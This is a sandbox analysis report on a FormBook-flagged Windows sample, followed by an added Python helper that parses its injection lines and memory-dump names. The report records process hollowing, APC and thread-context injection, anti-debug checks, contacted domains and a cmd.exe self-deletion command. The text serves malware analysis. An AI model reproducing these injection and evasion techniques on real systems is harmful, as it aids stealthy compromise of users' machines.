Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h] 2_2_008A26F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h] 4_2_025A26F8
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ejecutable1.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe Domain query: www.theseattlenotary.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable1.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable1.exe Memory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe' Jump to behavior
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ejecutable1.exe Queries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformation
Source: C:\Users\user\Desktop\ejecutable1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
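The following triage helper is an added example, not part of the Joe Sandbox report and not code belonging to the FormBook sample. It works on two pieces of evidence shown above: the behaviour lines from the injection section (section unmapped, RWX section mapped, MZ header written, APC queued, thread context set, cmd.exe spawned) and the memory-dump names carried by the FormBook Yara matches. It reconstructs which legs of the process-hollowing sequence the sandbox actually observed and in which target, confirms the self-deletion via cmd.exe, and decodes the dump names so that Yara hits in executable memory (the unpacked payload) can be told apart from hits in plain read/write memory. The .sdmp field layout assumed here (process index, pass, dump id, base address, PAGE_* protection, type flags) is an assumption: the process index and base address fields agree with the report (explorer.exe is process 00000003 and msdt.exe 00000004 in the memory-string sources, and the 0000000000400000 dump coincides with the "Memory written ... base: 400000" line), the protection field is interpreted with the documented Windows PAGE_* constants, and the trailing field is kept raw rather than guessed at.

```python
"""Added triage helper: turn Joe Sandbox behaviour lines and memory-dump names into an injection summary."""
import re

# Behaviour lines copied from the report above (Joe Sandbox format, link text removed).
BEHAVIOUR_LINES = [
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Memory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe Thread register set: target process: 1764",
    r"Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764",
    r"Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'",
]

# Memory dumps carrying the FormBook Yara matches, copied from the report above.
YARA_DUMPS = [
    "00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp",
    "00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp",
    "00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp",
    "00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp",
    "00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp",
    "00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp",
    "00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp",
    "00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp",
    "00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp",
]

# One regex per injection primitive the report names. 'src' is the acting process, 'dst' the target.
_P = r"^Source: (?P<src>\S+) "
EDGE_PATTERNS = [
    ("section_mapped", re.compile(_P + r"Section loaded: unknown target: (?P<dst>\S+) protection: (?P<prot>.+)$")),
    ("section_unmapped", re.compile(_P + r"Section unmapped: (?P<dst>\S+) base address: (?P<base>[0-9A-Fa-f]+)$")),
    ("pe_written", re.compile(_P + r"Memory written: (?P<dst>\S+) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>\w+)$")),
    ("apc_queued", re.compile(_P + r"Thread APC queued: target process: (?P<dst>\S+)$")),
    ("thread_context_set", re.compile(_P + r"Thread register set: target process: (?P<dst>\d+)$")),
    ("process_created", re.compile(_P + r"Process created: (?P<dst>\S+)(?P<args>.*)$")),
]

def parse_edges(lines):
    """Return (src, dst, kind, detail) tuples for every line that matches an injection primitive."""
    edges = []
    for line in lines:
        for kind, pat in EDGE_PATTERNS:
            m = pat.match(line.strip())
            if m:
                detail = {k: v.strip() for k, v in m.groupdict().items() if k not in ("src", "dst")}
                edges.append((m["src"], m["dst"], kind, detail))
                break
    return edges

def hollowing_indicators(edges):
    """Process hollowing = unmap the target image, write a new PE (MZ header) over it, point a thread at it.
    Each leg is reported separately so an analyst sees which ones the sandbox actually observed."""
    unmapped = {dst for _, dst, kind, _ in edges if kind == "section_unmapped"}
    rwx_mapped = {dst for _, dst, kind, d in edges if kind == "section_mapped" and "execute" in d["prot"]}
    return {
        "unmapped_then_rwx": sorted(unmapped & rwx_mapped),
        "pe_header_written": sorted({dst for _, dst, k, d in edges if k == "pe_written" and d["magic"].upper() == "4D5A"}),
        "thread_context_set": sorted({dst for _, dst, k, _ in edges if k == "thread_context_set"}),
        "apc_targets": sorted({dst for _, dst, k, _ in edges if k == "apc_queued"}),
    }

def self_deletion(edges, sample_path):
    """True when any process spawns cmd.exe with a 'del' of the sample's own path."""
    for _, dst, kind, d in edges:
        if kind == "process_created" and dst.lower().endswith("cmd.exe"):
            args = d["args"].lower()
            if "del" in args.split() and sample_path.lower() in args:
                return True
    return False

# Windows PAGE_* protection constants (winnt.h); the dump name carries the protection as hex.
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                   0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# Assumed .sdmp name layout: <process index>.<pass>.<dump id>.<base address>.<protection>.<type flags>.
# Process index and base address agree with the report; the trailing 'type flags' field is kept raw, not interpreted.
DUMP_NAME = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")

def decode_dump_name(name):
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError("not a Joe Sandbox memory dump name: " + name)
    proc, _pass, dump_id, base, prot, type_flags = m.groups()
    prot_val = int(prot, 16) & 0xFF  # drop PAGE_GUARD / PAGE_NOCACHE modifier bits
    return {"process_index": int(proc, 16), "dump_id": int(dump_id), "base": int(base, 16),
            "protection": PAGE_PROTECTION.get(prot_val, hex(prot_val)), "executable": bool(prot_val & 0xF0),
            "type_flags": int(type_flags, 16)}

def split_yara_hits(names):
    """Split Yara-matched dumps into executable regions (unpacked code) and plain RW regions (config/heap data)."""
    decoded = [dict(name=n, **decode_dump_name(n)) for n in names]
    return [d for d in decoded if d["executable"]], [d for d in decoded if not d["executable"]]

if __name__ == "__main__":
    edges = parse_edges(BEHAVIOUR_LINES)
    print(hollowing_indicators(edges), "self-deletion:", self_deletion(edges, r"C:\Users\user\Desktop\ejecutable1.exe"))
    exe, rw = split_yara_hits(YARA_DUMPS)
    print(f"FormBook Yara hits: {len(exe)} in executable memory, {len(rw)} in read/write memory")
```

Run against the lines above, the helper shows the hollowing target is msdt.exe (the only process that is both unmapped and re-mapped RWX), that the MZ header is written into the sample's own second instance, that explorer.exe is reached through an APC, and that PID 1764 has its thread context set by both ejecutable1.exe and msdt.exe. Seven of the nine FormBook Yara hits sit in PAGE_EXECUTE_READWRITE memory and two in PAGE_READWRITE memory; when picking a dump to carve the unpacked FormBook binary from, start with the RWX ones, since the RW regions are more likely to hold decrypted strings or configuration than code.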